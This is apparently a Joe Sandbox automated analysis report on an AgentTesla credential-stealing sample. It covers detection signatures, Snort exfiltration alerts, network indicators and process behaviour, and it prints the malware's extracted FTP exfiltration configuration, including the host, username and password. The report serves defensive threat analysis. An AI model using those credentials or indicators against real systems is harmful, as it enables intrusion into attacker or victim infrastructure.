Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Q4YODvoYjL.exe

Overview

General Information

Sample Name:Q4YODvoYjL.exe
Original Sample Name:e30c67b19383f259d7414b763049eb2f.exe
Analysis ID:830848
MD5:e30c67b19383f259d7414b763049eb2f
SHA1:8a1465b73066cf8642d39c9ef2333d8361e9d177
SHA256:182086eeecf6f1b4dc82a040a476d947759556513ad63c129604c565cd06cdc3
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Q4YODvoYjL.exe (PID: 576 cmdline: C:\Users\user\Desktop\Q4YODvoYjL.exe MD5: E30C67B19383F259D7414B763049EB2F)
    • Q4YODvoYjL.exe (PID: 352 cmdline: C:\Users\user\Desktop\Q4YODvoYjL.exe MD5: E30C67B19383F259D7414B763049EB2F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.valvulasthermovalve.cl", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: Q4YODvoYjL.exe PID: 352JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: Q4YODvoYjL.exe PID: 352JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5190.107.177.23949700549262851779 03/20/23-18:32:35.384138
          SID:2851779
          Source Port:49700
          Destination Port:54926
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5190.107.177.23949699212029927 03/20/23-18:32:35.159386
          SID:2029927
          Source Port:49699
          Destination Port:21
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Q4YODvoYjL.exeReversingLabs: Detection: 30%
          Source: Q4YODvoYjL.exeVirustotal: Detection: 38%Perma Link
          Antivirus detection for URL or domain
          Source: http://ftp.valvulasthermovalve.clURL Reputation: Label: phishing
          Multi AV Scanner detection for domain / URL
          Source: ftp.valvulasthermovalve.clVirustotal: Detection: 13%Perma Link
          Machine Learning detection for sample
          Source: Q4YODvoYjL.exeJoe Sandbox ML: detected
          Source: 0.2.Q4YODvoYjL.exe.3fd4f10.8.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.valvulasthermovalve.cl", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}
          Source: Q4YODvoYjL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.5:49698 version: TLS 1.2
          Source: Q4YODvoYjL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: kmTG.pdb source: Q4YODvoYjL.exe
          Source: Binary string: kmTG.pdbSHA256vL source: Q4YODvoYjL.exe

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49699 -> 190.107.177.239:21
          Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49700 -> 190.107.177.239:54926
          May check the online IP address of the machine
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: Joe Sandbox ViewASN Name: SOCCOMERCIALWIRENETCHILELTDACL SOCCOMERCIALWIRENETCHILELTDACL
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewIP Address: 190.107.177.239 190.107.177.239
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficTCP traffic: 192.168.2.5:49700 -> 190.107.177.239:54926
          Source: unknownFTP traffic detected: 190.107.177.239:21 -> 192.168.2.5:49699 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: Q4YODvoYjL.exe, 00000001.00000002.562716771.0000000000C96000.00000004.00000020.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000003.352966359.0000000000C92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.valvulasthermovalve.cl
          Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
          Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
          Source: unknownDNS traffic detected: queries for: api.ipify.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.5:49698 version: TLS 1.2
          Source: Q4YODvoYjL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 0_2_011EC8440_2_011EC844
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 0_2_011EF1F80_2_011EF1F8
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 0_2_011EF1E80_2_011EF1E8
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D7A8F81_2_00D7A8F8
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D7C8B81_2_00D7C8B8
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D79CE01_2_00D79CE0
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D7A0281_2_00D7A028
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D759E31_2_00D759E3
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D77F0B1_2_00D77F0B
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0538C78C1_2_0538C78C
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0538F5B11_2_0538F5B1
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0538C7801_2_0538C780
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0538AA701_2_0538AA70
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0538D8501_2_0538D850
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_066062581_2_06606258
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_066052881_2_06605288
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_066000401_2_06600040
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0660B8A81_2_0660B8A8
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_066019681_2_06601968
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_066088401_2_06608840
          Source: Q4YODvoYjL.exe, 00000000.00000002.355813847.00000000071C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000000.297927431.00000000008D8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekmTG.exe> vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.356622503.0000000007480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002C87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002C87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002D17000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.346823897.0000000003C49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.346823897.0000000003FA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000001.00000002.562654629.00000000007E8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000001.00000002.562504272.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exeBinary or memory string: OriginalFilenamekmTG.exe> vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Q4YODvoYjL.exeReversingLabs: Detection: 30%
          Source: Q4YODvoYjL.exeVirustotal: Detection: 38%
          Source: Q4YODvoYjL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exeJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Q4YODvoYjL.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
          Source: Q4YODvoYjL.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: Q4YODvoYjL.exeBinary or memory string: g.slN
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Q4YODvoYjL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Q4YODvoYjL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Q4YODvoYjL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: kmTG.pdb source: Q4YODvoYjL.exe
          Source: Binary string: kmTG.pdbSHA256vL source: Q4YODvoYjL.exe
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 0_2_011ECB36 pushfd ; ret 0_2_011ECB39
          Source: initial sampleStatic PE information: section name: .text entropy: 7.867913508227014
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
